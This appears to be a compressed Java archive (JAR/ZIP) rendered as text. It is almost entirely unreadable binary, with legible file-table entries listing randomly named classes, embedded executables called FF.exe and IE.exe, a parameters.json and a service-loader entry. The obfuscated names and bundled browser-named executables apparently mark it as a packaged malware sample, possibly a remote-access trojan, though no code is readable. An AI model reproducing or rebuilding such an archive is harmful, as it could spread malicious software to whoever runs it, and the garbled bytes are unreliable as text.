��r;�")�8��n#�i���;^�������")5%���x�{"wG'D/D_c��6�%DCWCSG��+ʧ����{��W@��e����a <ȋPe��(�� ����@D8�g���x�,T��fqk��,��JY
Yʙs�ä_�;o���>����R��z��k ̃[�uu��Ldԭ,_��/�u���[u�g��D�%0'ѽ@�|��k��]��f�����5P���W��4PצF
��"�B�T��#i��?m����	�;�xm�m���\#�!���,��h��e,��?���x���8YI���S����O 5?����<��=�[־�{����?�QK�=��|����Q�qw`��p"�� la� ����ّ���B	�=R���qct����Zv��_�P���_(�0�,�u�~̌|!��M�F�����!�j[`,ߵ�W1_�#m���]��_��$��_(%��Ȏ^�,ф�	@�t�	ܹ�Ѳ�3���L���D9�e��N6�v@�^��|^����� x]�H�?p�D�V��zx'7EA㞬�=�8`�軷LE���7�N����ǭ���W�*�$=qtv�8�F���ӯf���]�������6z]��߲5���D?�\*^��2���У�?�޾bd��|u��u�|?�DW��!���<W�uo$�5��;���>��D�b�#�ȯ�ĥ_�ʴ��0�祉�8=�g�8L	F�͸(�8Y��l�����7��;�B��0~-`$���ʖO��a�� �d3�q1^Ϙz�Q\L��w�
5�yq�%\A ��8�ذ���I?����ԺN^�)B��m�&//ꮨ���W�b���cgda��'�jC����1�Z��%K���,~��9�o,���0sS�5���������3��8�j�7��f��5@�:��o�HfL}M�4<�s<tW�X��l.2�Y������Z�)�,(d���/�N�D�M�H:���KN���YL ��� ��⳽��̒S��e��K�ח~�$~,5()�ޟ9�2[����тE��������>��������I�Y�2��L<K8�";�<l�Es�%���`m���`߲��¥��º��:'pYBeB{v�X[���X��6��H�`~y�) ��K3�t�V؍P���Rl���� �2���y��G,��wZ��� �卙S�R�9�����D�ο�6��&	ͨ��7��gBC���0�ʼ̱,5V�H^� f޾�� �Y"��n��U����&�W��&}��?�� H������#�ğ�k%Y-�P.H/��!@��o�Dqq��hj�	7���<H Ƥ�#�AH !��������d�i�9j9�2�t']@�Dژ�l �~����H&Z��S��4'�t�L�����/U��`T1�?�l���{.=����ÝZ��Yp$�
a�������.S=V^k=u�r���M��b��%����Wϧm��p����t�W���+�W>]�y2���X�
���k�ב�5)�)
c�o�h���=`���AG����v�\�'T�]C��V�@heuD�{6l�����=�#��D�S�9gJw9腊Һ����CZ����#'�?!(�����W��{��A%�Z=���Z!v�3�Ss�JwIqMS�̊�n ������@�����w��Fdg��U㫪���&?VG-ylbm�w�k[33�Z],j���7hu��܆|���uu��y��?[hM����.�|THu�+�LAX8�̥�^���4��km���@BE��"
ġHhH�0�H@p@H�C��$f`Ъ		
,"����HmAQ�U�U��"V@�����(�����}�������y��}�>�>+�+�'�5���9uu�K爫:+\>������l��֤,T��l�	�Yk�I����1"�N�ay�`+�<i�>d|iP��2i�Z#��s����z�`r���	��-�3! e����L��W������b��A�n�O�4��2Ӯ�t.�Ri�7���IF����Q�n҂��#����gr�̷���:��B]p`6�r�5����Zmv/=6t�ͦ�/�����s*=s���~;z��ɧ�C����w���ar�+
��u�1�4_k�.�먿�܂ٶ)T��ڣ�u�!���R����WΘ��W���v??29���j�cO������t'�B���7g	�W�'���~�ܲ��5�������-��=��������j1�G�>>���{مo��!��D�\���*�[G��8F�7hNf��Oe���p������f�\W�ݥ��ڿ���0I�
�mvTݼ���>3��w���oh�޿���Xh_Ӛ~r��{�����_�n����m�˯���K�D�
̕;i�>�}�<1h~ɯ��Gk��j���7��܂�w�4���{�J�k6h��*��Y�+h�5�^�3�+o����\����eU#�-4^�چ�ܯ,.�������[N2�i'a8fb��$���E�m��_|��vW�����7�ߥ Y����Xi�����Q_N��l�,��`����w���T���,1�c�b���Z�IY�y���K�ٹ�:��]����O����'�[⩰�̵�G�c��K�P�ٶǯעO�?l�6�m~a_ƺ�=�:�v��/���N�rJ�u�q�6��ãm?���J:f(V��f�	஺b��M�qPq̲.2S���s+���%cQ�as�S��0�_T|³4R������I��% |�X�/�F�q|�J���<����9��x+�:�I'te�v�	�'�e��r�(�o�FX�)��������x!+���?��i?���~�x䂫���_J>�i��S�R[��k�c���е��H<�.3ͮT�dJ�t�6��9�-��<ok��Y�^V�A���]f�񄱍a����,�G�9ڹY��dN�����o�؏jJz���i;�wu�
�� ����Z�w���&:��y���1  �bq/o����ٸ���J��|��F/<�V�a~��\!�Uo	�׶D��!�*3��Ɨ��ZA��[]�2l��c�M_<�>���Y�
V��&���O���On_��[F�t���2�u�S������Ё�o����;�`�+Pҹ��7���AŖ�]�d��� M�}`h4�~Ɂ;�h]������eX�~����E�cő��W��9�N<���g���7#�`Zs.��Q
���,ɬ�OYσ�*�]Z�Dd�ܗ ��Dv�~���Ґ'CGOL�|S�*n8��d(���l��/Us�f�[>9$VX�e���3�n��(��x�f�KX)�@#�굊+A�k� ��#�&
߆������nn��q�q�n6�Kװ<��:Ă�yl���6�F��qr�2���bt�o]���>ݖ���-D*؝&#>��U�r����Fǌ	�<~�6�H��q�[��ғ
v�l]Z�J�7�����H����&�Ÿ���3�3���`�K"��ы-�̟��귟'<���`CY!m�xc����o��Z���|�/��|���,��h#Kw�/,Iq��YҼ�
�g\��Pm���xĕu��+ː�ژ;��^D��l�]?wqԖ�GH��Wb�7p��Xv�������N���v�x&e���+����v{�����cI��9Og�=����lw��8���_&&�/�[-t�ͻ�?k\��z���J�
�s��p�����.��=�}�H��3�!e�r髠�v����v�U���M�f�������]�)�F�7�[�w�����O����Ka7 a�X��	gm�~��B0��Ќ�Ь���������)�ʙ���ȷ��qVsF�)K��H�)����b��T/�S�y�ያ����M���fՆe"��[��*�!�0�͝��l�0jv�[�Y\�e3'ּ��L��M��H�0�V��{s��{H�E�U5J��M̙�!�a������=���٥+ч��]��b�`�Ba��ɦ'F�	�sS�J�@IQ �pD?;R}�e�@������h������WPXc@|0���{+RH�6-�zY�~j�.Myi(�`�#(���;��'�b)��4�.�fR�]�Րd�L�8]H$�s\J�]������dp����W)j�}ت�	�/� l�bk5ȩr��&�z�UX�S�͚����)� "��0�z�S�\�������~#�i�#�}+��W��o�P��Lۀ�L#0�msf�i�~O2ף|�I�Uc|�;/7�mDgb����t�K��@0Bo��x� �X�~*�<��aT����t\C?��������z�|a��dt��C���z%++��s�@�G{����}H8\��A�x*ּ�����l\�X?l���	=��#D��H��}×�M<�	߄�F¿��E2�&�P�.��	��(^�A�	�jVMh���S�E	 ��z�<�� ��+5�AZ��?�k��x<���6pP�6�OK�G*-%QLJ��
�T�C����I��/�$B���gd�Bɓxb��!�B
2�s�T�B%~)N%!$
�J.Y���C�<�k��/�*�qJW�4q%O�HI� �yQ�P���hH(����J�$N:m���s�;?�S�Ur�2u#�ڬBF��(I$�����fV
�j8�%Ab�����y
�$I� ��$����C
���xbD&��9������9Q�>ܜ!mn��ln
C��;�`�G�i�|�U!X�W�����?�����ߐ:�T���:L����w�o�~��Xa_��=�P��� ����a#@ ~ak9���R14}�bD�A�R��pܒ'Oe �?��dK"G2 k?��������!K���0)2ևwG�O	���2e�D�>���!���yS�X���	�\�PK
    �k�H9�gͿ   �    _013_/resources/parameters.json  �      �       ���
�0��>E�Y�{�-Ń�ID�t[I��V�ww�V(X	��cv��\�a;�Ȣ�mK��DĭUơc��ﶇr�p�;�L����~�ZpN����Q����k�f�$���;>I�7��������W�P�8W�O�v'ɽzo#Λ�	o2CSe�4x�+�	�ќ�UdU��Rp��蔕KV��֫�PK
     �k�H               META-INF/services/PK
    �k�H�ēa&   $     META-INF/services/module.Server  $       &       s�(�v+r-�/��v���K	�I.qLO*p�(t��� PK
     �k�H                      �A    DxtKFrEpOshkEWYK/PK
     �k�H            !          �A/   DxtKFrEpOshkEWYK/dWLctAgbpEhqCSW/PK
     �k�H            	         �An   META-INF/��  PK
     �k�H                      �A�   _013_/PK
     �k�H                      �A�   _013_/resources/PK
    �k�H �E��    *           ���   DxtKFrEpOshkEWYK/dWLctAgbpEhqCSW/Con.classPK
    �k�H�ϰP  1  *           ��?  DxtKFrEpOshkEWYK/dWLctAgbpEhqCSW/NUl.classPK
    �k�H��x              ���  _013_/resources/FF.exePK
    �k�HJ�9�   �             ���! _013_/resources/IE.exePK
    �k�H9�gͿ   �             ��,� _013_/resources/parameters.jsonPK
     �k�H                      �A<� META-INF/services/PK
    �k�H�ēa&   $              ��l� META-INF/services/module.ServerPK      M  ��   